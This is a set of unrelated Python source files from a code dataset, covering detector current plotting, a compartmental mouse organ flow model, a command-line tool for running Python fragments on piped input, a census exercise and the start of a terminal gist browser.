plt.show()\n plt.clf()\n\ndef plot_mean_differences_current_vs_channel(number_of_cells, file_list, rel_label):\n\n # For the mean :\n cells = np.arange(0, number_of_cells, 1)\n current_matrix = np.zeros((number_of_cells, len(file_list)))\n current_std_matrix = np.zeros((number_of_cells, len(file_list)))\n\n for i, file in enumerate(file_list):\n x, y, current, current_std, timestamp = readout.read_file(file, 'space')\n\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = file.split(\"/\")[0]\n filename = file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n if rel_label:\n string = 'relative'\n axis_label = 'Relative Intensity [%]'\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio ** 2 + error_ratio[index_of_max] ** 2)\n\n current = rel_current * 100\n current_std = delta_rel_current * np.abs(100)\n\n else:\n string = 'absolute'\n axis_label = 'Intensity [nA]'\n\n current_matrix[:, i] = current\n current_std_matrix[:, i] = current_std\n\n plt.scatter(cells, current, linewidth='0.3', label=plot_name, color=xkcd_colors[i])\n del x, y, current, current_std, timestamp\n\n\n mean = current_matrix.mean(axis=1)\n mean_std = current_matrix.std(axis=1)\n\n plt.plot(cells, mean, 'k-', linewidth='0.5', label='mean of runs')\n plt.fill_between(cells, mean - mean_std, mean + mean_std, color=sns.xkcd_rgb['amber'])\n plt.legend(bbox_to_anchor=(0, 1.10, 1, 0.2), loc=\"lower left\", mode='expand', ncol=4, fontsize=8)\n\n plt.ylabel(axis_label)\n plt.xlabel('Cell number')\n plt.title('Pixel Stability : {}'.format(folder))\n plt.savefig('./Output/{}/all_{}_mean_current_vs_channels.png'.format(folder, string), bbox_inches='tight')\n plt.show()\n plt.clf()\n del string\n\n # For the differences :\n string = ''\n for i, file in enumerate(file_list):\n x, y, current, current_std, timestamp = readout.read_file(file, 'space')\n\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = file.split(\"/\")[0]\n filename = file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n if rel_label:\n string += 'relative'\n axis_label = 'Relative - not much meaning'\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio ** 2 + error_ratio[index_of_max] ** 2)\n\n current = rel_current * 100\n current_std = delta_rel_current * np.abs(100)\n\n else:\n string += 'absolute'\n axis_label = 'Relative Difference wrt Mean [%]'\n\n differences = ((mean - current) / mean) * np.array(100)\n plt.plot(cells, differences, 'k-', linewidth='1.', label=plot_name, color=xkcd_colors[i])\n\n plt.legend(bbox_to_anchor=(0, 1.10, 1, 0.2), loc=\"lower left\", mode='expand', ncol=4, fontsize=8)\n plt.ylabel(axis_label)\n plt.xlabel('Cell number')\n plt.title('Pixel Stability : {}'.format(folder))\n plt.savefig('./Output/{}/all_{}_differences_current_vs_channels.png'.format(folder, string), bbox_inches='tight')\n plt.show()\n plt.clf()\n\n\ndef plot_projections(xo, xf, yo, yf, current, current_std, steps, path_to_file, rel_label):\n # xo : beginning of X-axis\n # xf : end of X-axis\n # yo : beginning of Y-axis\n # yf : end of Y-axis\n # steps : number of measurements in along the axis X and Y (it should be equal in both axis)\n # path_to_file : path to the file as string 
type (usually a element of a file_list)\n # rel_label : Boolean (True : compute relative intensity wrt the maximum - False : just the absolute intensity)\n\n\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = path_to_file.split(\"/\")[0]\n filename = path_to_file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n x_axis = np.linspace(xo, xf, steps)\n y_axis = np.linspace(yo, yf, steps)\n\n string = ''\n\n if rel_label:\n string += 'relative'\n axis_label = 'Relative Intensity [%]'\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio**2 + error_ratio[index_of_max]**2)\n\n matrix = (np.reshape(rel_current, (steps, steps))).T * 100\n matrix_std = (np.reshape(delta_rel_current, (steps, steps))).T * np.abs(100)\n\n else:\n string += 'absolute'\n axis_label = 'Intensity [nA]'\n matrix = (np.reshape(current, (steps, steps))).T\n matrix_std = (np.reshape(current_std, (steps, steps))).T\n\n for i in range(len(x_axis)):\n plt.plot(x_axis, matrix[i, :], color='black', linewidth=0.5, marker='o', markerfacecolor='black', markersize=2)\n plt.fill_between(x_axis, matrix[i, :] - matrix_std[i, :], matrix[i, :] + matrix_std[i, :], color=xkcd_colors[i])\n #for j in range(len(y_axis)):\n # plt.annotate(np.around(matrix[i, j], decimals=2), ((x_axis[j]), matrix[i, j]))\n plt.title('{} : {} - X projection'.format(plot_name, folder))\n plt.xlabel('x axis [mm]')\n plt.ylabel(axis_label)\n plt.savefig('./Output/{}/{}_{}_Xproj.png'.format(folder, string, plot_name), bbox_inches='tight')\n plt.show()\n\n for j in range(len(y_axis)):\n plt.plot(y_axis, matrix[:, j], color='black', linewidth=0.5, marker='o', markerfacecolor='black', markersize=2)\n plt.fill_between(y_axis, matrix[:, j] - matrix_std[:, j], matrix[:, j] + matrix_std[:, j], color=xkcd_colors[j])\n #for i in range(len(x_axis)):\n # plt.annotate(np.around(matrix[j, i], decimals=2), ((y_axis[j]), matrix[j, i]))\n\n plt.title('{} : {} - Y projection'.format(plot_name, folder))\n plt.xlabel('y axis [mm]')\n plt.ylabel(axis_label)\n plt.savefig('./Output/{}/{}_{}_Yproj.png'.format(folder, string, plot_name), bbox_inches='tight')\n plt.show()\n plt.clf()\n\n\ndef plot_stability_in_time(file_list, rel_label):\n # file_list : list of file paths\n # rel_label : Boolean (True : compute relative intensity wrt the maximum - False : just the absolute intensity)\n\n\n fig, ax = plt.subplots()\n xfmt = md.DateFormatter('%Y/%m/%d %H:%M:%S')\n ax.xaxis.set_major_formatter(xfmt)\n\n\n for i, file in enumerate(file_list):\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = file.split(\"/\")[0]\n filename = file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n x, y, current, current_std, timestamp = readout.read_file(file, 'space')\n\n if rel_label:\n string = 'relative'\n axis_label = 'Relative Intensity [%]'\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio ** 2 + error_ratio[index_of_max] ** 2)\n\n rel_current *= np.array(100)\n delta_rel_current *= np.array(np.abs(100))\n\n current= rel_current\n current_std = delta_rel_current\n else:\n string = 'absolute'\n axis_label = 'Intensity [nA]'\n\n\n plt.plot(timestamp, current, 'k-', linewidth='0.5', label=plot_name, 
color=xkcd_colors[i])\n plt.fill_between(timestamp, current - current_std, current + current_std, color=xkcd_colors[i])\n\n del x, y, current, current_std, timestamp\n\n plt.ylabel(axis_label)\n plt.legend(bbox_to_anchor=(0, 1.10, 1, 0.2), loc=\"lower left\", mode='expand', ncol=4, fontsize=10)\n plt.xlabel('Time')\n plt.title('Intensity in time : {}'.format(folder))\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n plt.savefig('./Output/{}/Current_in_Time_runs.png'.format(folder), bbox_inches='tight')\n plt.show()\n plt.clf()\n\n\ndef plot_projection_interpolation(xo, xf, current, current_std, steps, path_to_file, rel_label, which_axis):\n # xo : beginning of X-axis (or Y-axis)\n # xf : end of X-axis (or Y-axis)\n # steps : number of measurements in along the axis X and Y (it should be equal in both axis)\n # path_to_file : path to the file as string type (usually a element of a file_list)\n # rel_label : Boolean (True : compute relative intensity wrt the maximum - False : just the absolute intensity)\n # which_axis : Scanned axis, only two possible values: 'x' or 'y'\n\n radius = np.array(1.02) # m\n I_max = np.max(current) # nA\n list_of_off = []\n\n # folder and plot_name came from one component of a file list which is a string type, divided into 2 strings\n folder = path_to_file.split(\"/\")[0]\n filename = path_to_file.split(\"/\")[1]\n plot_name = filename.split('.')[0]\n\n if rel_label:\n string = 'proj_inter_relative'\n y_axis_label = 'Relative Intensity [%]'\n\n rel_current = current / np.max(current)\n error_ratio = current_std / current\n\n index_of_max = np.argmax(current)\n delta_rel_current = rel_current * np.sqrt(error_ratio ** 2 + error_ratio[index_of_max] ** 2)\n\n matrix = (np.reshape(rel_current, (steps, steps))).T * 100\n matrix_std = (np.reshape(delta_rel_current, (steps, steps))).T * np.abs(100)\n\n else:\n string = 'proj_inter_absolute'\n y_axis_label = 'Intensity [nA]'\n\n matrix = (np.reshape(current, (steps, steps))).T\n matrix_std = (np.reshape(current_std, (steps, steps))).T\n\n if which_axis == 'y':\n matrix = matrix\n matrix_std = matrix_std\n if which_axis == 'x':\n matrix = matrix.T\n matrix_std = matrix_std.T\n\n\n distance = (np.linspace(xo, xf, steps) / 1000)\n\n for i, position in enumerate(distance):\n # Fit function\n # Irradiance ~ cos^3 (angle)\n fitfunc = lambda p, x: (I_max / radius ** 2) * np.cos(p[0]*(np.arctan(x/radius - p[1]/radius)))**3 + p[2]\n # Distance to the target function\n errfunc = lambda p, x, y: fitfunc(p, x) - y\n\n # Initial guess for the parameters\n data_points = matrix[:, i]\n data_errors = matrix_std[:, i]\n\n initial_params = [np.pi , distance[np.argmax(data_points)], 2]\n params, success = optimize.leastsq(errfunc, initial_params[:], args=(distance, data_points))\n (freq, distance_off, shift) = params\n\n list_of_off.append(distance_off)\n\n\n # bigger list of angles to use in the interpolated function\n new_angles = np.linspace(distance.min(), distance.max(), 100)\n data_fitted = fitfunc(params, new_angles)\n fit_maximum = np.max(data_fitted)\n\n angles_fit = np.linspace(distance.min(), distance.max(), 100) - np.array(distance_off)\n angles_fit = np.arctan(angles_fit / radius)\n angles_fit = np.degrees(angles_fit)\n\n angles_data = np.arctan((distance - np.array(distance_off)) / radius)\n angles_data = np.degrees(angles_data)\n\n #print(params)\n\n fig, ay1 = plt.subplots()\n\n label = '$\\dfrac{I_{max}}{D_{flasher}^2}\\cos^3\\Theta $'\n\n x_axis_label = 'Scan position [mm]'\n 
axis_color = 'tab:blue'\n        ay1.set_ylabel(y_axis_label)\n        ay1.set_xlabel(x_axis_label, color=axis_color)\n        ay1.tick_params(axis='x', labelcolor=axis_color)\n\n        ay1.plot(distance*1000, data_points, label='Data')\n        ay1.fill_between(distance*1000, data_points - data_errors, data_points + data_errors, color=sns.xkcd_rgb['yellow orange'])\n        ay1.xaxis.set_ticks(distance*1000)\n        ay1.plot()\n\n        #for i, txt in enumerate(data_points):\n        #    ay1.annotate(np.around(txt, decimals=2), (distance[i]*1000, data_points[i]))\n\n\n        ay2 = ay1.twiny()\n        x_axis_label = '$\\Theta$ [$^\\circ$]'\n        axis_color = 'tab:red'\n        ay2.set_ylabel(y_axis_label)\n        ay2.set_xlabel(x_axis_label, color=axis_color)\n        ay2.tick_params(axis='x', labelcolor=axis_color)\n        ay2.plot(angles_data, data_points, label='Data')\n        ay2.plot(angles_fit, data_fitted, 'r--', label=label)\n\n        plt.legend(bbox_to_anchor=(0, 0.0, 0.5, 0.20), loc=\"lower left\", mode='expand', ncol=1, fontsize=12)\n\n        if which_axis == 'x':\n            at_string = 'y'\n            plt.text(0.60, 0.80, \"\"\"\n            $x_{flasher}$ : %.1f mm\n            $y$ : %.1f mm\n            \"\"\" % (distance_off*1000, position*1000),\n                     fontsize=10, color='black', horizontalalignment='left', verticalalignment='bottom', transform=ay1.transAxes)\n        if which_axis == 'y':\n            at_string = 'x'\n            plt.text(0.60, 0.80, \"\"\"\n            $y_{flasher}$ : %.1f mm\n            $x$ : %.1f mm\n            \"\"\" % (distance_off * 1000, position*1000),\n                     fontsize=10, color='black', horizontalalignment='left', verticalalignment='bottom', transform=ay1.transAxes)\n\n\n        figure_name = './Output/{}/{}_{}_{}_at_{}.png'.format(folder, plot_name, string, at_string, distance[i]*1000)\n        plt.savefig(figure_name)\n        plt.show()\n        plt.clf()\n    list_of_off = np.array(list_of_off) * np.array(1000)\n    mean_of_off = np.average(list_of_off)\n    return mean_of_off\n","sub_path":"doplots.py","file_name":"doplots.py","file_ext":"py","file_size_in_byte":27970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"648555297","text":"import numpy as np\n\nclass StateVar:\n\n\tdef __init__(self, name, initial_val=0):\n\t\tself.name = name\n\t\tself.value = initial_val\n\t\tself.ix = None\n\t\tself.d_dt = 0\n\t\tself.metabolic_fn = lambda x: 0\n\n\nclass OrganModel:\n\n\tdef __init__(self):\n\t\tself.state_vars = []\n\t\tself.flows = []\n\t\tself.input_fn = None\n\n\tdef add_var(self, state_var):\n\t\t# convert to StateVar obj if string\n\t\tif type(state_var) is str:\n\t\t\tstate_var = StateVar(state_var)\n\n\t\t# unique naming\n\t\tnames = [sv.name for sv in self.state_vars]\n\t\tif state_var.name in names:\n\t\t\traise ValueError('Variable named {} already exists.'.format(state_var.name))\n\n\t\tself.state_vars.append(state_var)\n\t\tstate_var.ix = len(self.state_vars)-1\n\n\tdef get_var(self, name):\n\t\t# return StateVar obj by name\n\t\tfor sv in self.state_vars:\n\t\t\tif sv.name == name:\n\t\t\t\treturn sv\n\t\traise ValueError('No state_var named {}'.format(name))\n\n\tdef get_val(self, name):\n\t\treturn self.get_var(name).value\n\n\tdef add_flow(self, from_var, to_var, fn):\n\t\tflows = [set([f[0],f[1]]) for f in self.flows]\n\t\tset_flows = set([from_var, to_var])\n\n\t\t# make sure flow is not defined yet and is proper\n\t\tif set_flows in flows:\n\t\t\traise ValueError('Flow between {} already defined'.format(set_flows))\n\t\telif len(set_flows) == 1:\n\t\t\traise ValueError('Only one flow var defined')\n\n\t\t# check var names in flow\n\t\tfor f in set_flows:\n\t\t\tself.get_var(f)\n\n\t\tself.flows.append((from_var, to_var, fn))\n\n\tdef eval_derivative(self, at_state=None, t=None):\n\n\t\torig_state = self.get_state()\n\n\t\tself.set_state(at_state)\n\n\t\t# evaluate each flow term and sum them together\n\t\tfor from_name, to_name, fn in self.flows:\n\t\t\tfrom_var = self.get_var(from_name)\n\t\t\tto_var = self.get_var(to_name)\n\n\t\t\tfrom_var.d_dt = from_var.d_dt - fn(from_var.value)\n\t\t\tto_var.d_dt = to_var.d_dt + fn(from_var.value)\n\n\t\t# evaluate metabolic rate and add to d_dt\n\t\tfor sv in self.state_vars:\n\t\t\tsv.d_dt += sv.metabolic_fn(sv.value)\n\n\t\td_dt_vec = np.array([sv.d_dt for sv in self.state_vars])\n\n\t\tif (self.input_fn is not None) or (t is not None):\n\n\t\t\tif self.input_fn is None:\n\t\t\t\traise ValueError('t specified but no input_fn has been defined.')\n\n\t\t\td_dt_vec += self.input_fn(t)\n\n\t\t# reset d_dt to 0\n\t\tfor sv in self.state_vars:\n\t\t\tsv.d_dt = 0\n\n\t\t# reset state\n\t\tself.set_state(orig_state)\n\n\t\treturn d_dt_vec\n\n\tdef set_input_fn(self, input_fn):\n\t\t# should be vector fn corresponding to states\n\t\tself.input_fn = input_fn\n\n\tdef get_state(self):\n\t\treturn np.array([[sv.value] for sv in self.state_vars])\n\n\tdef set_state(self, state):\n\t\t# specify state to eval d_dt_vec or just use current state\n\t\tif state is not None:\n\n\t\t\tif len(state) != len(self.state_vars):\n\t\t\t\traise ValueError('Size of input vector does not match N states.')\n\n\t\t\tfor i, var in enumerate(self.state_vars):\n\t\t\t\tvar.value = state[i]\n\n\tdef get_derivative(self, t):\n\t\t# convenience wrapper around eval_derivative, which already applies self.input_fn\n\t\t# at time t (StateVar objects have no eval_derivative of their own)\n\t\treturn self.eval_derivative(t=t)\n\n\n
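# [Added usage sketch - not part of the original module] A tiny two-compartment model\n# with a hand-rolled forward-Euler loop; the 0.1 rate, dt and step count are arbitrary\n# illustration values:\nif __name__ == '__main__':\n\tdemo = OrganModel()\n\tdemo.add_var(StateVar('A', initial_val=1.0))\n\tdemo.add_var('B')\n\tdemo.add_flow('A', 'B', lambda x: 0.1 * x) # 10% of A flows to B per unit time\n\tstate = demo.get_state()\n\tdt = 0.1\n\tfor _ in range(10): # crude Euler steps: state <- state + dt * d(state)/dt\n\t\tstate = state + dt * demo.eval_derivative(at_state=state).reshape(-1, 1)\n\t\tdemo.set_state(state)\n\tprint({sv.name: float(v) for sv, v in zip(demo.state_vars, state.ravel())})\n\n\n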
def real_mouse():\n\tmouse = OrganModel()\n\n\t# make state vars\n\tmouse.add_var('Venous Blood')\n\tmouse.add_var('Lung')\n\tmouse.add_var('Other Tissue')\n\t# mouse.add_var('Fat')\n\t# mouse.add_var('Bone')\n\t# mouse.add_var('Brain')\n\t# mouse.add_var('Heart')\n\t# mouse.add_var('Muscle')\n\t# mouse.add_var('Skin')\n\tmouse.add_var('Liver')\n\tmouse.add_var('Kidney')\n\tmouse.add_var('Gut')\n\tmouse.add_var('Spleen')\n\tmouse.add_var('Arterial Blood')\n\n\t# define all flows from https://www.sciencedirect.com/science/article/pii/S221138351630082X\n\n\n\td_art = .1\n\td_ven = .1\n\td_lung = .3\n\td_liv = .1\n\tmetab = -.05\n\n\t# venous flows\n\tmouse.add_flow('Venous Blood', 'Lung', lambda x: d_lung*x)\n\tmouse.add_flow('Other Tissue', 'Venous Blood', lambda x:d_ven*x)\n\t# mouse.add_flow('Fat', 'Venous Blood', lambda x: 1.0*x)\n\t# mouse.add_flow('Bone', 'Venous Blood', lambda x: 1.0*x)\n\t# mouse.add_flow('Brain', 'Venous Blood', lambda x: 1.0*x)\n\t# mouse.add_flow('Heart', 'Venous Blood', lambda x: 1.0*x)\n\t# mouse.add_flow('Muscle', 'Venous Blood', lambda x: 1.0*x)\n\t# mouse.add_flow('Skin', 'Venous Blood', lambda x: 1.0*x)\n\tmouse.add_flow('Liver', 'Venous Blood', lambda x: d_ven*x)\n\tmouse.add_flow('Kidney', 'Venous Blood', lambda x: d_ven*x)\n\n\t# arterial flows\n\tmouse.add_flow('Lung', 'Arterial Blood', lambda x: .01*d_lung*x)\n\tmouse.add_flow('Arterial Blood', 'Other Tissue', lambda x:d_art*x)\n\t# mouse.add_flow('Arterial Blood', 'Fat', lambda x: 1.0*x)\n\t# mouse.add_flow('Arterial Blood', 'Bone', lambda x: 1.0*x)\n\t# mouse.add_flow('Arterial Blood', 'Brain', lambda x: 1.0*x)\n\t# mouse.add_flow('Arterial Blood', 'Heart', lambda x: 1.0*x)\n\t# mouse.add_flow('Arterial Blood', 'Muscle', lambda x: 1.0*x)\n\t# mouse.add_flow('Arterial Blood', 'Skin', lambda x: 1.0*x)\n\tmouse.add_flow('Arterial Blood', 'Gut', lambda x: d_art*x)\n\tmouse.add_flow('Arterial Blood', 'Liver', lambda x: 
d_art*x)\n\tmouse.add_flow('Arterial Blood', 'Spleen', lambda x: d_art*x)\n\tmouse.add_flow('Arterial Blood', 'Kidney', lambda x: d_art*x)\n\n\t# other flows\n\tmouse.add_flow('Gut', 'Liver', lambda x: d_liv*x)\n\tmouse.add_flow('Spleen', 'Liver', lambda x: d_liv*x)\n\n\t# define metabolic rates\n\tmouse.get_var('Liver').metabolic_fn = lambda x: metab*x\n\tmouse.get_var('Kidney').metabolic_fn = lambda x: metab*x\n\n\n\treturn mouse\n\ndef simple_mouse():\n\n\tmouse = OrganModel()\n\n\t# make state vars\n\tmouse.add_var('Venous Blood')\n\tmouse.add_var('Lung')\n\tmouse.add_var('Other Tissue')\n\tmouse.add_var('Kidney')\n\tmouse.add_var('Spleen')\n\tmouse.add_var('Arterial Blood')\n\n\t# define all flows from https://www.sciencedirect.com/science/article/pii/S221138351630082X\n\n\n\td_art = .1\n\td_ven = .1\n\n\t# venous flows\n\tmouse.add_flow('Venous Blood', 'Lung', lambda x: 1.0*x)\n\tmouse.add_flow('Other Tissue', 'Venous Blood', lambda x:d_ven*x)\n\tmouse.add_flow('Kidney', 'Venous Blood', lambda x: d_ven*x)\n\n\t# arterial flows\n\tmouse.add_flow('Lung', 'Arterial Blood', lambda x: 1.0*x)\n\tmouse.add_flow('Arterial Blood', 'Other Tissue', lambda x:d_art*x)\n\tmouse.add_flow('Arterial Blood', 'Spleen', lambda x: d_art*x)\n\tmouse.add_flow('Arterial Blood', 'Kidney', lambda x: d_art*x)\n\n\tmouse.get_var('Kidney').metabolic_fn = lambda x: -0.5*x\n\n\n\treturn mouse\n\n\n\n","sub_path":"python_implementation/mouse_model.py","file_name":"mouse_model.py","file_ext":"py","file_size_in_byte":6018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"147217692","text":"import builtins\nimport functools\nimport importlib\nimport itertools\nimport sys\n\nfrom clize import Clize, run\nfrom clize.errors import MissingValue, UnknownOption\nfrom clize.parser import Parameter, NamedParameter\n\nfrom . 
import catcher, fragments\nfrom .decorators import decorators\nfrom .objects import Context, SpyFile, _ContextInjector\n\nimport spy\n\n\nPIPE_NAME = 'pipe'\n\n\nclass NullContext:\n def __enter__(self):\n pass\n def __exit__(self, typ, value, traceback):\n pass\n\n\ndef compile_(code, filename=''):\n try:\n return compile(code, filename, 'eval', 0, True, 0), True\n except SyntaxError:\n return compile(code, filename, 'exec', 0, True, 0), False\n\n\ndef make_callable(code, is_expr, env, pipe_name, debuginfo=(None, None)):\n local = env.view()\n local._spy_debuginfo = debuginfo\n proxy = local.overlay['spy'] = _ContextInjector(spy)\n if is_expr:\n def fragment_fn(value, context=None):\n local.overlay[pipe_name] = value\n proxy._ContextInjector__context = context\n return eval(code, env, local)\n else:\n def fragment_fn(value, context=None):\n local.overlay[pipe_name] = value\n proxy._ContextInjector__context = context\n eval(code, env, local)\n return local[pipe_name]\n fragment_fn._spy_debuginfo = debuginfo\n return fragment_fn\n\n\ndef make_context():\n context = Context()\n context.update(builtins.__dict__)\n return context\n\n\nclass _Decorated:\n def __init__(self, f, v, name):\n self.funcseq = f\n self.value = v\n self.name = name\n\n\nclass Decorator(NamedParameter):\n def __init__(self, *a, description, decfn, **kw):\n super().__init__(*a, **kw)\n self.description = description\n self.decfn = decfn\n\n def parse_one_arg(self, ba, arg):\n try:\n if arg[0:2] == '--':\n return [ba.sig.aliases[arg]]\n elif arg[0] == '-':\n return [ba.sig.aliases['-' + c] for c in arg[1:]]\n else:\n return arg\n except KeyError as e:\n raise UnknownOption(e.args[0])\n\n def read_argument(self, ba, i):\n src = None\n io = i\n funcseq = [self.decfn]\n names = [self.display_name]\n arg = ba.in_args[i]\n if arg[1] == '-':\n i += 1\n try:\n arg = ba.in_args[i]\n except:\n raise MissingValue\n else:\n if len(arg) >= 3:\n arg = '-' + arg[2:]\n else:\n i += 1\n try:\n arg = ba.in_args[i]\n except:\n raise MissingValue\n while True:\n narg = self.parse_one_arg(ba, arg)\n if isinstance(narg, list):\n for dec in narg:\n if not isinstance(dec, Decorator):\n raise MissingValue\n funcseq.append(dec.decfn)\n names.append(dec.display_name)\n elif isinstance(narg, str):\n src = narg\n break\n i += 1\n if i >= len(ba.in_args):\n raise MissingValue\n arg = ba.in_args[i]\n ba.skip = i - io\n funcseq.reverse()\n ba.args.append(_Decorated(funcseq, src, ' '.join(names)))\n\n\ndef _main(*steps,\n each_line: 'l' = False,\n start: (int, 's') = 0,\n end: (int, 'e') = None,\n pipe_name: Parameter.UNDOCUMENTED = PIPE_NAME,\n no_default_fragments: Parameter.UNDOCUMENTED = False,\n no_exception_handling: Parameter.UNDOCUMENTED = False,\n show_fragments: Parameter.UNDOCUMENTED = False):\n \"\"\"Run Python code.\n\n steps: At least one Python expression (or suite) to execute\n\n each_line: If specified, process lines as strings rather than all of stdin as a file\n\n start: Don't print before this result (zero-based)\n\n end: Stop after getting this result (zero-based)\n \"\"\"\n sys.setcheckinterval(10000)\n\n pipe_name = sys.intern(pipe_name)\n\n spy.context = context = make_context()\n\n step_src = steps\n steps = []\n for i, code in enumerate(step_src):\n fragment_name = 'Fragment {}'.format(i + 1)\n source = code\n if isinstance(code, _Decorated):\n source = '{} {!r}'.format(code.name, code.value)\n code, funcseq = code.value, code.funcseq\n else:\n funcseq = ()\n co, is_expr = compile_(code, filename=fragment_name)\n debuginfo = 
(fragment_name, source)\n        ca = make_callable(co, is_expr, context, pipe_name, debuginfo)\n        for fn in funcseq:\n            try:\n                ca = fn(ca, debuginfo=debuginfo)\n            except TypeError:\n                ca = fn(ca)\n        steps.append(spy.fragment(ca))\n\n    index_offset = 0\n\n    if not no_default_fragments:\n        steps.append(fragments.make_limit(start=start, end=end))\n        steps.append(fragments.print)\n\n    if each_line:\n        steps.insert(0, fragments.many)\n        index_offset -= 1\n\n    chain = spy.chain(steps, index_offset=index_offset)\n    data = [SpyFile(sys.stdin)]\n\n    if show_fragments:\n        print(chain.format())\n        return\n\n    if no_exception_handling:\n        context = NullContext()\n    else:\n        context = catcher.handler(delete_all=True)\n\n    with context:\n        chain.run_to_exhaustion(data)\n\n_main = Clize(_main, extra=tuple(Decorator(aliases=fn.decorator_names,\n                                           description=fn.decorator_help,\n                                           decfn=fn)\n                                 for fn in decorators))\n\ndef main():\n    run(_main)\n","sub_path":"spy/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":5745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"44790357","text":"habitantes = 1\r\nsalario_total = 0\r\ntotal_filhos = 0\r\nacima_mil = 0\r\n\r\nfor i in range(100000000000):\r\n\r\n    salario = int(input('Enter the salary of the inhabitant: '))\r\n    n_filhos = int(input('Enter the number of children: '))\r\n    n_parada = int(input('Enter 1 to add another inhabitant: '))\r\n    if n_parada != 1:\r\n        if salario > 1000:\r\n            acima_mil += 1\r\n        salario_total += salario\r\n        media_salario = salario_total / habitantes\r\n        total_filhos += n_filhos\r\n        media_filhos = total_filhos / habitantes\r\n        percentual = acima_mil * (100 / habitantes)\r\n        break\r\n    else:\r\n        if salario > 1000:\r\n            acima_mil += 1\r\n        salario_total += salario\r\n        media_salario = salario_total / habitantes\r\n        total_filhos += n_filhos\r\n        media_filhos = total_filhos / habitantes\r\n        percentual = acima_mil * (100 / habitantes)\r\n        habitantes += 1\r\n    \r\n\r\n\r\n\r\nprint(f'Number of inhabitants registered: {habitantes}')\r\nprint(f'Average salary: {\"%.2f\" % media_salario}')\r\nprint(f'Average number of children: {\"%.2f\" % media_filhos}')\r\nprint(f'Percentage of people earning more than R$1000: {\"%.2f\" % percentual}%')\r\n\r\n\r\n","sub_path":"cap_07_iteracao/Lista_Fábio_03_em_for/fabio_iteracao_Q24_censo.py","file_name":"fabio_iteracao_Q24_censo.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"569167206","text":"#!/usr/bin/env python\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nfrom fnmatch import fnmatch\nimport re\nimport sys\n\nfrom prompt_toolkit import Application\nfrom prompt_toolkit.buffer import Buffer\nfrom prompt_toolkit.enums import EditingMode\nfrom prompt_toolkit.key_binding import KeyBindings\nfrom prompt_toolkit.layout.containers import VSplit, Window, HSplit\nfrom prompt_toolkit.layout.controls import BufferControl\nfrom prompt_toolkit.lexers import Lexer\n\n\nfrom prompt_toolkit.layout.layout import Layout\nfrom prompt_toolkit.filters import to_filter, Condition\nfrom prompt_toolkit.styles import Style\nfrom pygments.lexers import Python3Lexer\n\nfrom prompt_toolkit.layout import Margin, NumberedMargin, ScrollbarMargin\nfrom prompt_toolkit.lexers import PygmentsLexer\nimport click\n\nfrom gistfinder.sync import Updater\nfrom .loader import Loader\nfrom .config import Config\nfrom .utils import print_temp\n\n\nfrom prompt_toolkit.styles.named_colors import 
NAMED_COLORS\nfrom prompt_toolkit.application.current import get_app\nfrom prompt_toolkit.filters import Condition\n\n@Condition\ndef not_in_search_mode():\n app = get_app()\n return app.state.layout.current_window != app.state.search_window\n\n\n\n# class RainbowLexer(Lexer):\n# def lex_document(self, document):\n# colors = list(sorted(NAMED_COLORS, key=NAMED_COLORS.get))\n#\n# def get_line(lineno):\n# ddd.ping()\n# return [(colors[i % len(colors)], c) for i, c in enumerate(document.lines[lineno])]\n#\n# return get_line\n\n\n\nclass AppState:\n SEARCH_DEFAULT_TEXT = ' Search:/ Window: Select: Exit: Help:'\n def __init__(self, loader):\n self.glob_expr = None\n self.text_expr = None\n self.desc_expr = None\n self.file_expr = None\n self.code_expr = None\n\n self.loader = loader\n\n self.list_buffer = Buffer(on_cursor_position_changed=self.list_row_change) # Editable buffer.\n # self.list_buffer.text = '\\n'.join(self.list_lines)\n self.sync_list_lines()\n\n self.list_buffer.read_only = to_filter(True)\n self.list_buffer.app_state = self\n\n self.content_buffer = Buffer() # Editable buffer.\n self.content_buffer.text = self.code(0)\n self.content_buffer.read_only = to_filter(True)\n self.content_buffer.app_state = self\n\n help_text = self.SEARCH_DEFAULT_TEXT\n self.search_buffer = Buffer(on_text_changed=self.search_text_change) # Editable buffer.\n self.search_buffer.app_state = self\n # self.search_buffer.text = help_text\n self.search_buffer.read_only = to_filter(True)\n self.search_buffer.app_state = self\n\n\n self._index = 0\n self.print_on_exit = False\n\n self._list_lines = None\n\n\n def sync_list_lines(self):\n # if self._list_lines is None:\n # self._list_lines = self.all_list_lines\n\n self.list_buffer.read_only = to_filter(False)\n self.list_buffer.text = '\\n'.join(self.list_lines)\n self.list_buffer.read_only = to_filter(True)\n\n def clear_searches(self):\n self.glob_expr = None\n self.text_expr = None\n self.desc_expr = None\n self.file_expr = None\n self.code_expr = None\n\n @property\n def list_recs(self):\n return self.loader.get(\n glob_expr=self.glob_expr,\n text_expr=self.text_expr,\n desc_expr=self.desc_expr,\n file_expr=self.file_expr,\n code_expr=self.code_expr\n )\n\n @property\n def list_lines(self):\n return [r['file_name'] for r in self.list_recs.values()]\n\n @property\n def descriptions(self):\n return [r['description'] for r in self.loader.records.values()]\n\n 